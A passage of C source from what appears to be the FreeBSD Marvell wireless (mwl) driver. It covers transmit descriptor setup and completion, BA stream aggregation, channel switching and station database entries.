m0->m_pkthdr.len; if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { qos = *(uint16_t *) (((struct ieee80211_qosframe_addr4 *) wh)->i_qos); copyhdrlen -= sizeof(qos); } else qos = *(uint16_t *) (((struct ieee80211_qosframe *) wh)->i_qos); } else qos = 0; if (iswep) { const struct ieee80211_cipher *cip; struct ieee80211_key *k; /* * Construct the 802.11 header+trailer for an encrypted * frame. The only reason this can fail is because of an * unknown or unsupported cipher/key type. * * NB: we do this even though the firmware will ignore * what we've done for WEP and TKIP as we need the * ExtIV filled in for CCMP and this also adjusts * the headers which simplifies our work below. */ k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { /* * This can happen when the key is yanked after the * frame was queued. Just discard the frame; the * 802.11 layer counts failures and provides * debugging/diagnostics. */ m_freem(m0); return EIO; } /* * Adjust the packet length for the crypto additions * done during encap and any other bits that the f/w * will add later on. 
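 *
 * For illustration only (typical cipher sizes, not taken from this
 * driver): a CCMP key normally adds an 8-byte IV/ExtIV header and an
 * 8-byte MIC, so pktlen grows by 16 bytes here; the exact amounts
 * come from the cipher's ic_header, ic_miclen and ic_trailer fields.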
*/ cip = k->wk_cipher; pktlen += cip->ic_header + cip->ic_miclen + cip->ic_trailer; /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0; /* XXX */ if (iswep) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; #if 0 sc->sc_tx_th.wt_rate = ds->DataRate; #endif sc->sc_tx_th.wt_txpower = ni->ni_txpower; sc->sc_tx_th.wt_antenna = sc->sc_txantenna; ieee80211_radiotap_tx(vap, m0); } /* * Copy up/down the 802.11 header; the firmware requires * we present a 2-byte payload length followed by a * 4-address header (w/o QoS), followed (optionally) by * any WEP/ExtIV header (but only filled in for CCMP). * We are assured the mbuf has sufficient headroom to * prepend in-place by the setup of ic_headroom in * mwl_attach. */ if (hdrlen < sizeof(struct mwltxrec)) { const int space = sizeof(struct mwltxrec) - hdrlen; if (M_LEADINGSPACE(m0) < space) { /* NB: should never happen */ device_printf(sc->sc_dev, "not enough headroom, need %d found %zd, " "m_flags 0x%x m_len %d\n", space, M_LEADINGSPACE(m0), m0->m_flags, m0->m_len); ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *), m0->m_len, 0, -1); m_freem(m0); sc->sc_stats.mst_tx_noheadroom++; return EIO; } M_PREPEND(m0, space, M_NOWAIT); } tr = mtod(m0, struct mwltxrec *); if (wh != (struct ieee80211_frame *) &tr->wh) ovbcopy(wh, &tr->wh, hdrlen); /* * Note: the "firmware length" is actually the length * of the fully formed "802.11 payload". That is, it's * everything except for the 802.11 header. In particular * this includes all crypto material including the MIC! */ tr->fwlen = htole16(pktlen - hdrlen); /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = mwl_tx_dmasetup(sc, bf, m0); if (error != 0) { /* NB: stat collected in mwl_tx_dmasetup */ DPRINTF(sc, MWL_DEBUG_XMIT, "%s: unable to setup dma\n", __func__); return error; } bf->bf_node = ni; /* NB: held reference */ m0 = bf->bf_m; /* NB: may have changed */ tr = mtod(m0, struct mwltxrec *); wh = (struct ieee80211_frame *)&tr->wh; /* * Formulate tx descriptor. */ ds = bf->bf_desc; txq = bf->bf_txq; ds->QosCtrl = qos; /* NB: already little-endian */ #if MWL_TXDESC == 1 /* * NB: multiframes should be zero because the descriptors * are initialized to zero. This should handle the case * where the driver is built with MWL_TXDESC=1 but we are * using firmware with multi-segment support. */ ds->PktPtr = htole32(bf->bf_segs[0].ds_addr); ds->PktLen = htole16(bf->bf_segs[0].ds_len); #else ds->multiframes = htole32(bf->bf_nseg); ds->PktLen = htole16(m0->m_pkthdr.len); for (i = 0; i < bf->bf_nseg; i++) { ds->PktPtrArray[i] = htole32(bf->bf_segs[i].ds_addr); ds->PktLenArray[i] = htole16(bf->bf_segs[i].ds_len); } #endif /* NB: pPhysNext, DataRate, and SapPktInfo setup once, don't touch */ ds->Format = 0; ds->pad = 0; ds->ack_wcb_addr = 0; mn = MWL_NODE(ni); /* * Select transmit rate. */ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: sc->sc_stats.mst_tx_mgmt++; /* fall thru... */ case IEEE80211_FC0_TYPE_CTL: /* NB: assign to BE q to avoid bursting */ ds->TxPriority = MWL_WME_AC_BE; break; case IEEE80211_FC0_TYPE_DATA: if (!ismcast) { const struct ieee80211_txparam *tp = ni->ni_txparms; /* * EAPOL frames get forced to a fixed rate and w/o * aggregation; otherwise check for any fixed rate * for the client (may depend on association state). 
*/ if (m0->m_flags & M_EAPOL) { const struct mwl_vap *mvp = MWL_VAP_CONST(vap); ds->Format = mvp->mv_eapolformat; ds->pad = htole16( EAGLE_TXD_FIXED_RATE | EAGLE_TXD_DONT_AGGR); } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { /* XXX pre-calculate per node */ ds->Format = htole16( mwl_calcformat(tp->ucastrate, ni)); ds->pad = htole16(EAGLE_TXD_FIXED_RATE); } /* NB: EAPOL frames will never have qos set */ if (qos == 0) ds->TxPriority = txq->qnum; #if MWL_MAXBA > 3 else if (mwl_bastream_match(&mn->mn_ba[3], qos)) ds->TxPriority = mn->mn_ba[3].txq; #endif #if MWL_MAXBA > 2 else if (mwl_bastream_match(&mn->mn_ba[2], qos)) ds->TxPriority = mn->mn_ba[2].txq; #endif #if MWL_MAXBA > 1 else if (mwl_bastream_match(&mn->mn_ba[1], qos)) ds->TxPriority = mn->mn_ba[1].txq; #endif #if MWL_MAXBA > 0 else if (mwl_bastream_match(&mn->mn_ba[0], qos)) ds->TxPriority = mn->mn_ba[0].txq; #endif else ds->TxPriority = txq->qnum; } else ds->TxPriority = txq->qnum; break; default: if_printf(ifp, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); sc->sc_stats.mst_tx_badframetype++; m_freem(m0); return EIO; } if (IFF_DUMPPKTS_XMIT(sc)) ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *)+sizeof(uint16_t), m0->m_len - sizeof(uint16_t), ds->DataRate, -1); MWL_TXQ_LOCK(txq); ds->Status = htole32(EAGLE_TXD_STATUS_FW_OWNED); STAILQ_INSERT_TAIL(&txq->active, bf, bf_list); MWL_TXDESC_SYNC(txq, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); ifp->if_opackets++; sc->sc_tx_timer = 5; MWL_TXQ_UNLOCK(txq); return 0; #undef IEEE80211_DIR_DSTODS } static __inline int mwl_cvtlegacyrix(int rix) { #define N(x) (sizeof(x)/sizeof(x[0])) static const int ieeerates[] = { 2, 4, 11, 22, 44, 12, 18, 24, 36, 48, 72, 96, 108 }; return (rix < N(ieeerates) ? ieeerates[rix] : 0); #undef N } /* * Process completed xmit descriptors from the specified queue. 
*/ static int mwl_tx_processq(struct mwl_softc *sc, struct mwl_txq *txq) { #define EAGLE_TXD_STATUS_MCAST \ (EAGLE_TXD_STATUS_MULTICAST_TX | EAGLE_TXD_STATUS_BROADCAST_TX) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_txbuf *bf; struct mwl_txdesc *ds; struct ieee80211_node *ni; struct mwl_node *an; int nreaped; uint32_t status; DPRINTF(sc, MWL_DEBUG_TX_PROC, "%s: tx queue %u\n", __func__, txq->qnum); for (nreaped = 0;; nreaped++) { MWL_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MWL_TXQ_UNLOCK(txq); break; } ds = bf->bf_desc; MWL_TXDESC_SYNC(txq, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->Status & htole32(EAGLE_TXD_STATUS_FW_OWNED)) { MWL_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MWL_TXQ_UNLOCK(txq); #ifdef MWL_DEBUG if (sc->sc_debug & MWL_DEBUG_XMIT_DESC) mwl_printtxbuf(bf, txq->qnum, nreaped); #endif ni = bf->bf_node; if (ni != NULL) { an = MWL_NODE(ni); status = le32toh(ds->Status); if (status & EAGLE_TXD_STATUS_OK) { uint16_t Format = le16toh(ds->Format); uint8_t txant = MS(Format, EAGLE_TXD_ANTENNA); sc->sc_stats.mst_ant_tx[txant]++; if (status & EAGLE_TXD_STATUS_OK_RETRY) sc->sc_stats.mst_tx_retries++; if (status & EAGLE_TXD_STATUS_OK_MORE_RETRY) sc->sc_stats.mst_tx_mretries++; if (txq->qnum >= MWL_WME_AC_VO) ic->ic_wme.wme_hipri_traffic++; ni->ni_txrate = MS(Format, EAGLE_TXD_RATE); if ((Format & EAGLE_TXD_FORMAT_HT) == 0) { ni->ni_txrate = mwl_cvtlegacyrix( ni->ni_txrate); } else ni->ni_txrate |= IEEE80211_RATE_MCS; sc->sc_stats.mst_tx_rate = ni->ni_txrate; } else { if (status & EAGLE_TXD_STATUS_FAILED_LINK_ERROR) sc->sc_stats.mst_tx_linkerror++; if (status & EAGLE_TXD_STATUS_FAILED_XRETRY) sc->sc_stats.mst_tx_xretries++; if (status & EAGLE_TXD_STATUS_FAILED_AGING) sc->sc_stats.mst_tx_aging++; if (bf->bf_m->m_flags & M_FF) sc->sc_stats.mst_ff_txerr++; } /* * Do any tx complete callback. Note this must * be done before releasing the node reference. * XXX no way to figure out if frame was ACK'd */ if (bf->bf_m->m_flags & M_TXCB) { /* XXX strip fw len in case header inspected */ m_adj(bf->bf_m, sizeof(uint16_t)); ieee80211_process_callback(ni, bf->bf_m, (status & EAGLE_TXD_STATUS_OK) == 0); } /* * Reclaim reference to node. * * NB: the node may be reclaimed here if, for example * this is a DEAUTH message that was sent and the * node was timed out due to inactivity. */ ieee80211_free_node(ni); } ds->Status = htole32(EAGLE_TXD_STATUS_IDLE); bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->sc_dmat, bf->bf_dmamap); m_freem(bf->bf_m); mwl_puttxbuf_tail(txq, bf); } return nreaped; #undef EAGLE_TXD_STATUS_MCAST } /* * Deferred processing of transmit interrupt; special-cased * for four hardware queues, 0-3. */ static void mwl_tx_proc(void *arg, int npending) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; int nreaped; /* * Process each active queue. 
*/ nreaped = 0; if (!STAILQ_EMPTY(&sc->sc_txq[0].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[0]); if (!STAILQ_EMPTY(&sc->sc_txq[1].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[1]); if (!STAILQ_EMPTY(&sc->sc_txq[2].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[2]); if (!STAILQ_EMPTY(&sc->sc_txq[3].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[3]); if (nreaped != 0) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; sc->sc_tx_timer = 0; if (!IFQ_IS_EMPTY(&ifp->if_snd)) { /* NB: kick fw; the tx thread may have been preempted */ mwl_hal_txstart(sc->sc_mh, 0); mwl_start(ifp); } } } static void mwl_tx_draintxq(struct mwl_softc *sc, struct mwl_txq *txq) { struct ieee80211_node *ni; struct mwl_txbuf *bf; u_int ix; /* * NB: this assumes output has been stopped and * we do not need to block mwl_tx_tasklet */ for (ix = 0;; ix++) { MWL_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MWL_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MWL_TXQ_UNLOCK(txq); #ifdef MWL_DEBUG if (sc->sc_debug & MWL_DEBUG_RESET) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct mwltxrec *tr = mtod(bf->bf_m, const struct mwltxrec *); mwl_printtxbuf(bf, txq->qnum, ix); ieee80211_dump_pkt(ic, (const uint8_t *)&tr->wh, bf->bf_m->m_len - sizeof(tr->fwlen), 0, -1); } #endif /* MWL_DEBUG */ bus_dmamap_unload(sc->sc_dmat, bf->bf_dmamap); ni = bf->bf_node; if (ni != NULL) { /* * Reclaim node reference. */ ieee80211_free_node(ni); } m_freem(bf->bf_m); mwl_puttxbuf_tail(txq, bf); } } /* * Drain the transmit queues and reclaim resources. */ static void mwl_draintxq(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_tx_draintxq(sc, &sc->sc_txq[i]); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; sc->sc_tx_timer = 0; } #ifdef MWL_DIAGAPI /* * Reset the transmit queues to a pristine state after a fw download. */ static void mwl_resettxq(struct mwl_softc *sc) { int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_txq_reset(sc, &sc->sc_txq[i]); } #endif /* MWL_DIAGAPI */ /* * Clear the transmit queues of any frames submitted for the * specified vap. This is done when the vap is deleted so we * don't potentially reference the vap after it is gone. * Note we cannot remove the frames; we only reclaim the node * reference. 
*/ static void mwl_cleartxq(struct mwl_softc *sc, struct ieee80211vap *vap) { struct mwl_txq *txq; struct mwl_txbuf *bf; int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) { txq = &sc->sc_txq[i]; MWL_TXQ_LOCK(txq); STAILQ_FOREACH(bf, &txq->active, bf_list) { struct ieee80211_node *ni = bf->bf_node; if (ni != NULL && ni->ni_vap == vap) { bf->bf_node = NULL; ieee80211_free_node(ni); } } MWL_TXQ_UNLOCK(txq); } } static int mwl_recv_action(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; const struct ieee80211_action *ia; ia = (const struct ieee80211_action *) frm; if (ia->ia_category == IEEE80211_ACTION_CAT_HT && ia->ia_action == IEEE80211_ACTION_HT_MIMOPWRSAVE) { const struct ieee80211_action_ht_mimopowersave *mps = (const struct ieee80211_action_ht_mimopowersave *) ia; mwl_hal_setmimops(sc->sc_mh, ni->ni_macaddr, mps->am_control & IEEE80211_A_HT_MIMOPWRSAVE_ENA, MS(mps->am_control, IEEE80211_A_HT_MIMOPWRSAVE_MODE)); return 0; } else return sc->sc_recv_action(ni, wh, frm, efrm); } static int mwl_addba_request(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int dialogtoken, int baparamset, int batimeout) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct ieee80211vap *vap = ni->ni_vap; struct mwl_node *mn = MWL_NODE(ni); struct mwl_bastate *bas; bas = tap->txa_private; if (bas == NULL) { const MWL_HAL_BASTREAM *sp; /* * Check for a free BA stream slot. */ #if MWL_MAXBA > 3 if (mn->mn_ba[3].bastream == NULL) bas = &mn->mn_ba[3]; else #endif #if MWL_MAXBA > 2 if (mn->mn_ba[2].bastream == NULL) bas = &mn->mn_ba[2]; else #endif #if MWL_MAXBA > 1 if (mn->mn_ba[1].bastream == NULL) bas = &mn->mn_ba[1]; else #endif #if MWL_MAXBA > 0 if (mn->mn_ba[0].bastream == NULL) bas = &mn->mn_ba[0]; else #endif { /* sta already has max BA streams */ /* XXX assign BA stream to highest priority tid */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: already has max bastreams\n", __func__); sc->sc_stats.mst_ampdu_reject++; return 0; } /* NB: no held reference to ni */ sp = mwl_hal_bastream_alloc(MWL_VAP(vap)->mv_hvap, (baparamset & IEEE80211_BAPS_POLICY_IMMEDIATE) != 0, ni->ni_macaddr, tap->txa_tid, ni->ni_htparam, ni, tap); if (sp == NULL) { /* * No available stream, return 0 so no * a-mpdu aggregation will be done. */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no bastream available\n", __func__); sc->sc_stats.mst_ampdu_nostream++; return 0; } DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: alloc bastream %p\n", __func__, sp); /* NB: qos is left zero so we won't match in mwl_tx_start */ bas->bastream = sp; tap->txa_private = bas; } /* fetch current seq# from the firmware; if available */ if (mwl_hal_bastream_get_seqno(sc->sc_mh, bas->bastream, vap->iv_opmode == IEEE80211_M_STA ? 
vap->iv_myaddr : ni->ni_macaddr, &tap->txa_start) != 0) tap->txa_start = 0; return sc->sc_addba_request(ni, tap, dialogtoken, baparamset, batimeout); } static int mwl_addba_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int code, int baparamset, int batimeout) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct mwl_bastate *bas; bas = tap->txa_private; if (bas == NULL) { /* XXX should not happen */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no BA stream allocated, TID %d\n", __func__, tap->txa_tid); sc->sc_stats.mst_addba_nostream++; return 0; } if (code == IEEE80211_STATUS_SUCCESS) { struct ieee80211vap *vap = ni->ni_vap; int bufsiz, error; /* * Tell the firmware to setup the BA stream; * we know resources are available because we * pre-allocated one before forming the request. */ bufsiz = MS(baparamset, IEEE80211_BAPS_BUFSIZ); if (bufsiz == 0) bufsiz = IEEE80211_AGGR_BAWMAX; error = mwl_hal_bastream_create(MWL_VAP(vap)->mv_hvap, bas->bastream, bufsiz, bufsiz, tap->txa_start); if (error != 0) { /* * Setup failed, return immediately so no a-mpdu * aggregation will be done. */ mwl_hal_bastream_destroy(sc->sc_mh, bas->bastream); mwl_bastream_free(bas); tap->txa_private = NULL; DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: create failed, error %d, bufsiz %d TID %d " "htparam 0x%x\n", __func__, error, bufsiz, tap->txa_tid, ni->ni_htparam); sc->sc_stats.mst_bacreate_failed++; return 0; } /* NB: cache txq to avoid ptr indirect */ mwl_bastream_setup(bas, tap->txa_tid, bas->bastream->txq); DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: bastream %p assigned to txq %d TID %d bufsiz %d " "htparam 0x%x\n", __func__, bas->bastream, bas->txq, tap->txa_tid, bufsiz, ni->ni_htparam); } else { /* * Other side NAK'd us; return the resources. */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: request failed with code %d, destroy bastream %p\n", __func__, code, bas->bastream); mwl_hal_bastream_destroy(sc->sc_mh, bas->bastream); mwl_bastream_free(bas); tap->txa_private = NULL; } /* NB: firmware sends BAR so we don't need to */ return sc->sc_addba_response(ni, tap, code, baparamset, batimeout); } static void mwl_addba_stop(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct mwl_bastate *bas; bas = tap->txa_private; if (bas != NULL) { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: destroy bastream %p\n", __func__, bas->bastream); mwl_hal_bastream_destroy(sc->sc_mh, bas->bastream); mwl_bastream_free(bas); tap->txa_private = NULL; } sc->sc_addba_stop(ni, tap); } /* * Setup the rx data structures. This should only be * done once or we may get out of sync with the firmware. */ static int mwl_startrecv(struct mwl_softc *sc) { if (!sc->sc_recvsetup) { struct mwl_rxbuf *bf, *prev; struct mwl_rxdesc *ds; prev = NULL; STAILQ_FOREACH(bf, &sc->sc_rxbuf, bf_list) { int error = mwl_rxbuf_init(sc, bf); if (error != 0) { DPRINTF(sc, MWL_DEBUG_RECV, "%s: mwl_rxbuf_init failed %d\n", __func__, error); return error; } if (prev != NULL) { ds = prev->bf_desc; ds->pPhysNext = htole32(bf->bf_daddr); } prev = bf; } if (prev != NULL) { ds = prev->bf_desc; ds->pPhysNext = htole32(STAILQ_FIRST(&sc->sc_rxbuf)->bf_daddr); } sc->sc_recvsetup = 1; } mwl_mode_init(sc); /* set filters, etc. 
*/ return 0; } static MWL_HAL_APMODE mwl_getapmode(const struct ieee80211vap *vap, struct ieee80211_channel *chan) { MWL_HAL_APMODE mode; if (IEEE80211_IS_CHAN_HT(chan)) { if (vap->iv_flags_ht & IEEE80211_FHT_PUREN) mode = AP_MODE_N_ONLY; else if (IEEE80211_IS_CHAN_5GHZ(chan)) mode = AP_MODE_AandN; else if (vap->iv_flags & IEEE80211_F_PUREG) mode = AP_MODE_GandN; else mode = AP_MODE_BandGandN; } else if (IEEE80211_IS_CHAN_ANYG(chan)) { if (vap->iv_flags & IEEE80211_F_PUREG) mode = AP_MODE_G_ONLY; else mode = AP_MODE_MIXED; } else if (IEEE80211_IS_CHAN_B(chan)) mode = AP_MODE_B_ONLY; else if (IEEE80211_IS_CHAN_A(chan)) mode = AP_MODE_A_ONLY; else mode = AP_MODE_MIXED; /* XXX should not happen? */ return mode; } static int mwl_setapmode(struct ieee80211vap *vap, struct ieee80211_channel *chan) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; return mwl_hal_setapmode(hvap, mwl_getapmode(vap, chan)); } /* * Set/change channels. */ static int mwl_chan_set(struct mwl_softc *sc, struct ieee80211_channel *chan) { struct mwl_hal *mh = sc->sc_mh; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; MWL_HAL_CHANNEL hchan; int maxtxpow; DPRINTF(sc, MWL_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x\n", __func__, chan->ic_freq, chan->ic_flags); /* * Convert to a HAL channel description with * the flags constrained to reflect the current * operating mode. */ mwl_mapchan(&hchan, chan); mwl_hal_intrset(mh, 0); /* disable interrupts */ #if 0 mwl_draintxq(sc); /* clear pending tx frames */ #endif mwl_hal_setchannel(mh, &hchan); /* * Tx power is cap'd by the regulatory setting and * possibly a user-set limit. We pass the min of * these to the hal to apply them to the cal data * for this channel. * XXX min bound? */ maxtxpow = 2*chan->ic_maxregpower; if (maxtxpow > ic->ic_txpowlimit) maxtxpow = ic->ic_txpowlimit; mwl_hal_settxpower(mh, &hchan, maxtxpow / 2); /* NB: potentially change mcast/mgt rates */ mwl_setcurchanrates(sc); /* * Update internal state. */ sc->sc_tx_th.wt_chan_freq = htole16(chan->ic_freq); sc->sc_rx_th.wr_chan_freq = htole16(chan->ic_freq); if (IEEE80211_IS_CHAN_A(chan)) { sc->sc_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_A); sc->sc_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_A); } else if (IEEE80211_IS_CHAN_ANYG(chan)) { sc->sc_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_G); sc->sc_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_G); } else { sc->sc_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_B); sc->sc_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_B); } sc->sc_curchan = hchan; mwl_hal_intrset(mh, sc->sc_imask); return 0; } static void mwl_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; DPRINTF(sc, MWL_DEBUG_STATE, "%s\n", __func__); } static void mwl_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; DPRINTF(sc, MWL_DEBUG_STATE, "%s\n", __func__); } static void mwl_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; (void) mwl_chan_set(sc, ic->ic_curchan); } /* * Handle a channel switch request. We inform the firmware * and mark the global state to suppress various actions. * NB: we issue only one request to the fw; we may be called * multiple times if there are multiple vap's. 
*/ static void mwl_startcsa(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; MWL_HAL_CHANNEL hchan; if (sc->sc_csapending) return; mwl_mapchan(&hchan, ic->ic_csa_newchan); /* 1 =>'s quiet channel */ mwl_hal_setchannelswitchie(sc->sc_mh, &hchan, 1, ic->ic_csa_count); sc->sc_csapending = 1; } /* * Plumb any static WEP key for the station. This is * necessary as we must propagate the key from the * global key table of the vap to each sta db entry. */ static void mwl_setanywepkey(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { if ((vap->iv_flags & (IEEE80211_F_PRIVACY|IEEE80211_F_WPA)) == IEEE80211_F_PRIVACY && vap->iv_def_txkey != IEEE80211_KEYIX_NONE && vap->iv_nw_keys[vap->iv_def_txkey].wk_keyix != IEEE80211_KEYIX_NONE) (void) mwl_key_set(vap, &vap->iv_nw_keys[vap->iv_def_txkey], mac); } static int mwl_peerstadb(struct ieee80211_node *ni, int aid, int staid, MWL_HAL_PEERINFO *pi) { #define WME(ie) ((const struct ieee80211_wme_info *) ie) struct ieee80211vap *vap = ni->ni_vap; struct mwl_hal_vap *hvap; int error; if (vap->iv_opmode == IEEE80211_M_WDS) { /* * WDS vap's do not have a f/w vap; instead they piggyback * on an AP vap and we must install the sta db entry and * crypto state using that AP's handle (the WDS vap has none). */ hvap = MWL_VAP(vap)->mv_ap_hvap; } else hvap = MWL_VAP(vap)->mv_hvap; error = mwl_hal_newstation(hvap, ni->ni_macaddr, aid, staid, pi, ni->ni_flags & (IEEE80211_NODE_QOS | IEEE80211_NODE_HT), ni->ni_ies.wme_ie != NULL ? WME(ni->ni_ies.wme_ie)->wme_info : 0); if (error == 0) { /* * Setup security for this station. For sta mode this is * needed even though do the same thing on transition to * AUTH state because the call to mwl_hal_newstation * clobbers the crypto state we setup. */ mwl_setanywepkey(vap, ni->ni_macaddr); } return error; #undef WME } static void mwl_setglobalkeys(struct ieee80211vap *vap) { struct ieee80211_key *wk; wk = &vap->iv_nw_keys[0]; for (; wk < &vap->iv_nw_keys[IEEE80211_WEP_NKID]; wk++) if (wk->wk_keyix != IEEE80211_KEYIX_NONE) (void) mwl_key_set(vap, wk, vap->iv_myaddr); } /* * Convert a legacy rate set to a firmware bitmask. */ static uint32_t get_rate_bitmap(const struct ieee80211_rateset *rs) { uint32_t rates; int i; rates = 0; for (i = 0; i < rs->rs_nrates; i++) switch (rs->rs_rates[i] & IEEE80211_RATE_VAL) { case 2: rates |= 0x001; break; case 4: rates |= 0x002; break; case 11: rates |= 0x004; break; case 22: rates |= 0x008; break; case 44: rates |= 0x010; break; case 12: rates |= 0x020; break; case 18: rates |= 0x040; break; case 24: rates |= 0x080; break; case 36: rates |= 0x100; break; case 48: rates |= 0x200; break; case 72: rates |= 0x400; break; case 96: rates |= 0x800; break; case 108: rates |= 0x1000; break; } return rates; } /* * Construct an HT firmware bitmask from an HT rate set. */ static uint32_t get_htrate_bitmap(const struct ieee80211_htrateset *rs) { uint32_t rates; int i; rates = 0; for (i = 0; i < rs->rs_nrates; i++) { if (rs->rs_rates[i] < 16) rates |= 1<<rs->rs_rates[i]; } return rates; } /* * Craft station database entry for station. * NB: use host byte order here, the hal handles byte swapping.
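 *
 * For illustration only (assumed rate set): a basic 11b rate set of
 * {2, 4, 11, 22} (1/2/5.5/11 Mb/s) produces a LegacyRateBitMap of
 * 0x00f from get_rate_bitmap() above.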
*/ static MWL_HAL_PEERINFO * mkpeerinfo(MWL_HAL_PEERINFO *pi, const struct ieee80211_node *ni) { const struct ieee80211vap *vap = ni->ni_vap; memset(pi, 0, sizeof(*pi)); pi->LegacyRateBitMap = get_rate_bitmap(&ni->ni_rates); pi->CapInfo = ni->ni_capinfo; if (ni->ni_flags & IEEE80211_NODE_HT) { /* HT capabilities, etc */ pi->HTCapabilitiesInfo = ni->ni_htcap; /* XXX pi.HTCapabilitiesInfo */ pi->MacHTParamInfo = ni->ni_htparam; pi->HTRateBitMap = get_htrate_bitmap(&ni->ni_htrates); pi->AddHtInfo.ControlChan = ni->ni_htctlchan; pi->AddHtInfo.AddChan = ni->ni_ht2ndchan; pi->AddHtInfo.OpMode = ni->ni_htopmode; pi->AddHtInfo.stbc = ni->ni_htstbc; /* constrain according to local configuration */ if ((vap->iv_flags_ht & IEEE80211_FHT_SHORTGI40) == 0) pi->HTCapabilitiesInfo &= ~IEEE80211_HTCAP_SHORTGI40; if ((vap->iv_flags_ht & IEEE80211_FHT_SHORTGI20) == 0) pi->HTCapabilitiesInfo &= ~IEEE80211_HTCAP_SHORTGI20; if (ni->ni_chw != 40) pi->HTCapabilitiesInfo &= ~IEEE80211_HTCAP_CHWIDTH40; } return pi; } /* * Re-create the local sta db entry for a vap to ensure * up to date WME state is pushed to the firmware. Because * this resets crypto state this must be followed by a * reload of any keys in the global key table. */ static int mwl_localstadb(struct ieee80211vap *vap) { #define WME(ie) ((const struct ieee80211_wme_info *) ie) struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211_node *bss; MWL_HAL_PEERINFO pi; int error; switch (vap->iv_opmode) { case IEEE80211_M_STA: bss = vap->iv_bss; error = mwl_hal_newstation(hvap, vap->iv_myaddr, 0, 0, vap->iv_state == IEEE80211_S_RUN ? mkpeerinfo(&pi, bss) : NULL, (bss->ni_flags & (IEEE80211_NODE_QOS | IEEE80211_NODE_HT)), bss->ni_ies.wme_ie != NULL ? WME(bss->ni_ies.wme_ie)->wme_info : 0); if (error == 0) mwl_setglobalkeys(vap); break; case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: error = mwl_hal_newstation(hvap, vap->iv_myaddr, 0, 0, NULL, vap->iv_flags & IEEE80211_F_WME, 0); if (error == 0) mwl_setglobalkeys(vap); break; default: error = 0; break; } return error; #undef WME } static int mwl_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct mwl_vap *mvp = MWL_VAP(vap); struct mwl_hal_vap *hvap = mvp->mv_hvap; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni = NULL; struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = 